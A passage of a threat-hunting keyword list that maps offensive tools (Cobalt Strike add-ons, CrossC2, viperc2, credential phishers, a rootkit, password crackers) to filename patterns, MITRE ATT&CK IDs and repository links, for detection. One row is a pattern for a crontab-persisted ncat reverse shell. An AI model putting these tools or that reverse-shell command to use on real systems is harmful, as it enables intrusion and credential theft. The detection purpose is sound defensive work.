Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/xforcered/CredBandit,1,1,N/A,10,10,218,25,2021-07-14T17:42:41Z,2021-03-17T15:19:33Z -*credBanditx64*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/xforcered/CredBandit,1,1,N/A,10,10,218,25,2021-07-14T17:42:41Z,2021-03-17T15:19:33Z -*creddump.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Credential Guard bypass might fail if RunAsPPL is enabled*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*CredentialAccess_CredentialDumping_BrowserDataCSharp.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*CredentialAccess_CredentialDumping_KiwiOnLocal.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*CredentialAccess_CredentialDumping_SunLogin.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*CredentialAccess_CredentialDumping_WindowsHashDump.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*CredentialAccess_CredentialDumping_WindowsWDigestEnable.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*CredentialAccess_CredentialInFiles_BrowserData.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*CredentialAccess_CredentialInFiles_WindowsSoftware.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*CredentialAccess_InputCapture_CredUIPromptForWindowsCredentialsW.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Credentials Found in Configurations!*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*Credentials*hekatomb_*.txt,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Credentials/CacheDump.*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Credentials/certsync_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Credentials/LSASecrets.*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Credentials/SAMDump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*CredPhisher.csproj*,offensive_tool_keyword,CredPhisher,Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function,T1056.002 - T1111,TA0004 ,N/A,N/A,Phishing,https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*CredPhisher.exe*,offensive_tool_keyword,CredPhisher,Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function,T1056.002 - T1111,TA0004 ,N/A,N/A,Phishing,https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*credphisher.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*cred-popper *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*CredPrompt/CredPrompt.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*creds_hunt.exe*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*CredsLeaker*,offensive_tool_keyword,CredsLeaker,This script used to display a powershell credentials box asked the user for credentials. However. That was highly noticeable. Now its time to utilize Windows Security popup!,T1087 - T1056 - T1003 - T1059 - T1110,TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/Dviros/CredsLeaker,1,1,N/A,N/A,3,295,73,2021-03-31T11:49:57Z,2018-03-05T07:53:31Z -*CredsPhish.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Credz-Plz.ps1*,offensive_tool_keyword,OMG-Credz-Plz,A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.,T1056.002 - T1566.001 - T1567.002,TA0004 - TA0040 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*Credz-Plz-Execute.txt*,offensive_tool_keyword,OMG-Credz-Plz,A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.,T1056.002 - T1566.001 - T1567.002,TA0004 - TA0040 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*cribdragg3r/Alaris*,offensive_tool_keyword,cobaltstrike,A protective and Low Level Shellcode Loader that defeats modern EDR systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cribdragg3r/Alaris,1,1,N/A,10,10,846,136,2021-11-01T05:00:43Z,2020-02-22T15:42:37Z -*crimeware*/zeus.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*crisis_monitor start*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*crisis_monitor stop*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*crisprss/PrintSpoofer*,offensive_tool_keyword,cobaltstrike,Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crisprss/PrintSpoofer,1,1,N/A,10,10,76,8,2021-10-07T17:45:00Z,2021-10-07T17:28:45Z -*crk_get_key1*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*crk_get_key2*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*crk_max_keys_per_crypt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*crk_methods.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*crk_password_loop*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Cronos Rootkit.*,offensive_tool_keyword,Cronos-Rootkit,Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/XaFF-XaFF/Cronos-Rootkit,1,0,N/A,N/A,8,742,176,2022-03-29T08:26:03Z,2021-08-25T08:54:45Z -*CronosDebugger.*,offensive_tool_keyword,Cronos-Rootkit,Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/XaFF-XaFF/Cronos-Rootkit,1,1,N/A,N/A,8,742,176,2022-03-29T08:26:03Z,2021-08-25T08:54:45Z -*CronosRootkit.*,offensive_tool_keyword,Cronos-Rootkit,Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/XaFF-XaFF/Cronos-Rootkit,1,1,N/A,N/A,8,742,176,2022-03-29T08:26:03Z,2021-08-25T08:54:45Z -*crontab* sleep *ncat * -e /bin/bash*crontab*,greyware_tool_keyword,crontab,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,POST Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*crop.exe \\*\*.lnk \\*\harvest \\*\harvest*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*CrossC2 beacon*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*crossc2 dyn load*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2 framework*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2.cna*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2.cna*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2.git*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2.Linux*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2.MacOS*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2.Win*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - 